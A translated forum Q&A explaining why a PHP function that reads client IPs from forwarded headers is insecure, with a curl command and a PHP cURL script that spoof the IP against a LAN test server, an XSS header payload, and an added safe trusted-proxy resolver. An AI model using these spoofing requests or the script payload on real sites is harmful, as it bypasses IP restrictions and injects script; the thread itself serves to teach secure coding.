Why isn't it good to use this function, and how do I identify the user's IP then?

2
public function get_client_ip() {
    $ipaddress = '';
    // Every HTTP_* entry in $_SERVER is copied straight from a request header,
    // so each of these branches returns whatever the client chose to send.
    if (isset($_SERVER['HTTP_CLIENT_IP']))
        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else if (isset($_SERVER['HTTP_X_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    else if (isset($_SERVER['HTTP_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
    else if (isset($_SERVER['HTTP_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_FORWARDED'];
    else if (isset($_SERVER['REMOTE_ADDR']))
        // Only this value is filled in by the server's TCP stack, not by the client.
        $ipaddress = $_SERVER['REMOTE_ADDR'];
    else
        $ipaddress = 'Desconhecido'; // "Unknown"

    return $ipaddress;
}

This code is not good because it has security problems, as I have seen said several times here on the forum.

How do I get the IP then? In PHP.

    
asked by anonymous 21.07.2017 / 22:10

1 answer

5

Because you trust the header sent by the client, simple as that. This allows the client to spoof the IP (IP spoofing).

Basically the rule is "Never trust any header", just as you should never trust a cookie (which is also a header).

How to attack this code? You can even test it yourself!

  • Server:

    echo 'IP deste codigo: ' . get_client_ip();
    echo PHP_EOL;
    echo 'IP real:         ' . $_SERVER['REMOTE_ADDR'];
    
  • Client:

    curl http://seusite.com -H "CLIENT-IP: 111.222.333.444"
    

curl is a program for making requests; the -H parameter adds a header, in this case one named CLIENT-IP with the value 111.222.333.444. There are several other programs that can do this too; I think curl is the most widely used, but it is very far from being the only one.

For the "simulation" I used a notebook as the client (IP 192.168.100.196) and a desktop as the server (IP 192.168.100.122) that had the above code, both on the same network, so I executed:

curl http://192.168.100.122/iptester.php -H "CLIENT-IP: 111.222.333.444"

Result:

IP deste codigo: 111.222.333.444
IP real:         192.168.100.196

Done, we have a fake IP! We can bypass any IP restriction! >:D

Note that your function trusts the header that was sent. This could be even more serious because, as we are using echo get_client_ip();, it is vulnerable to XSS, after all:

CLIENT-IP: <script>alert('xss')</script>

This would run in the browser, because there is no filtering.

If you want to attack using PHP itself, then also use cURL:

<?php
// Target page running the vulnerable get_client_ip() above, and the address we want it to report.
$alvo = 'http://192.168.100.122/iptester.php';
$ipFalso = '111.222.333.444';

$curl = curl_init($alvo);

curl_setopt_array($curl, [
    // Send every header the vulnerable function checks, so whichever branch
    // it reaches first returns our value instead of REMOTE_ADDR.
    CURLOPT_HTTPHEADER => [
        'CLIENT-IP:' . $ipFalso,
        'X-FORWARDED-FOR:' . $ipFalso,
        'X-FORWARDED:' . $ipFalso,
        'FORWARDED-FOR:' . $ipFalso,
        'FORWARDED:' . $ipFalso,
    ],
]);

// Without CURLOPT_RETURNTRANSFER the response body is written straight to output.
curl_exec($curl);
curl_close($curl);

Assuming that http://192.168.100.122/iptester.php contains the sample code mentioned above. ;)

    
21.07.2017 / 23:01
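The answer above shows the attack but stops short of showing what a safe resolver looks like. The following is an added example, not code from the original question or answer: it trusts X-Forwarded-For only when the TCP peer (REMOTE_ADDR) is one of our own proxies, walks the header from the right so that anything the client prepended is never reached, and rejects values that are not valid IP addresses (filter_var discards both `111.222.333.444` and `<script>…</script>`). The trusted-proxy list and the two `$server` arrays are constructed for the demo and are assumptions, not values from the page; `$server` is passed in instead of reading `$_SERVER` directly so the function can be exercised offline.

```php
<?php
// Added example (not from the original post). Assumptions: the trusted proxy
// ranges below and the sample request arrays are made up for the demonstration.

// Match a single IP against "a.b.c.d", "a.b.c.d/bits" or an IPv6 equivalent.
function ip_in_cidr(string $ip, string $cidr): bool
{
    if (strpos($cidr, '/') === false) {
        return $ip === $cidr;
    }
    [$subnet, $bits] = explode('/', $cidr, 2);
    $ipBin  = inet_pton($ip);
    $subBin = inet_pton($subnet);
    if ($ipBin === false || $subBin === false || strlen($ipBin) !== strlen($subBin)) {
        return false; // invalid literal, or IPv4 range tested against an IPv6 address
    }
    $bits  = (int) $bits;
    $bytes = intdiv($bits, 8);
    $rem   = $bits % 8;
    if (substr($ipBin, 0, $bytes) !== substr($subBin, 0, $bytes)) {
        return false;
    }
    if ($rem === 0) {
        return true;
    }
    $mask = (0xFF << (8 - $rem)) & 0xFF;
    return (ord($ipBin[$bytes]) & $mask) === (ord($subBin[$bytes]) & $mask);
}

function is_trusted_proxy(string $ip, array $trustedProxies): bool
{
    foreach ($trustedProxies as $cidr) {
        if (ip_in_cidr($ip, $cidr)) {
            return true;
        }
    }
    return false;
}

// $server is normally $_SERVER. X-Forwarded-For is "client, proxy1, proxy2":
// each proxy appends the peer it saw. Walking from the right, every hop that is
// one of our proxies is skipped; the first hop that is not ours is the client.
// Whatever the client itself put in the header sits further left and is never read.
function get_client_ip_safe(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'unknown';
    }
    if (!is_trusted_proxy($remote, $trustedProxies) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        // Direct connection, or no header: REMOTE_ADDR is set by the TCP stack,
        // not by the client, so it is the only value we can believe.
        return $remote;
    }
    $hops   = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    $hops[] = $remote; // the immediate peer completes the chain
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        $hop = $hops[$i];
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            // Not an IP at all (bad octets, HTML, etc.): stop trusting the chain.
            return $remote;
        }
        if (!is_trusted_proxy($hop, $trustedProxies)) {
            return $hop;
        }
    }
    return $remote; // every hop was one of our own proxies (e.g. a health check)
}

// Constructed sample requests for the demo; not captured traffic.
$trusted = ['10.0.0.0/8', '192.168.100.1'];

// Same attack as in the answer: the notebook talks to the server directly and
// sends forged headers. The peer is not a trusted proxy, so the headers are ignored.
$direct = [
    'REMOTE_ADDR'          => '192.168.100.196',
    'HTTP_CLIENT_IP'       => '111.222.333.444',
    'HTTP_X_FORWARDED_FOR' => '111.222.333.444',
];
echo 'direct:    ', get_client_ip_safe($direct, $trusted), PHP_EOL;

// Request that really came through two of our proxies (10.0.0.9 then 10.0.0.5);
// the client also prepended a forged value, which is to the left and never reached.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '111.222.333.444, 203.0.113.7, 10.0.0.9',
];
echo 'via proxy: ', get_client_ip_safe($viaProxy, $trusted), PHP_EOL;
```

In the first case the function returns REMOTE_ADDR (192.168.100.196), exactly the "IP real" line from the answer, because a peer that is not one of our proxies gets no say over the result. In the second it returns 203.0.113.7, the rightmost hop that is not one of our proxies; the forged leftmost entry is never consulted. The important operational detail is the trusted-proxy list: if it is empty the function degrades to plain REMOTE_ADDR, and if it is too broad (for example 0.0.0.0/0) you are back to trusting the client's header, which is the bug in the original function.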